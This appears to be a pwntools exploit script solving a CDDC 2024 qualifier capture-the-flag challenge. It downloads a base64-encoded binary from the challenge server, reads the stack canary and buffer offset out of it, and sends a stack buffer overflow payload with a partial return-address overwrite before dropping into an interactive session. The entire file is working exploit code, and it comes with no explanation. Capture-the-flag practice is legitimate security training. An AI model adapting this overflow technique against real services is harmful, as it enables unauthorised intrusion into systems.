from pwn import *
import base64
r = remote('cddc2024-qualifiers-nlb-231aa6753cb7a1e6.elb.ap-southeast-1.amazonaws.com', 10914)
r.recvuntil(b'Exploit Me>\n')
elf_bytes = r.recvuntil(b'input>', drop=True).decode()
elf_bytes = base64.b64decode(elf_bytes)
fp = open('exploitme', 'wb')
fp.write(elf_bytes)
fp.close()
elf = context.binary = ELF('./exploitme')
e = ELF.from_bytes(elf.read(0x12b0,8), vma=0xc000)
pad = int(e.disasm(e.entry,7).split(' ')[-1],16) - 8
canary = int.from_bytes(elf.read(0x4010,8)[::-1])
log.info(f"canary: {hex(canary)}")
payload = b'A'*pad + p64(canary) + b'A'*8 + b'\x55'
r.send(payload)
r.interactive()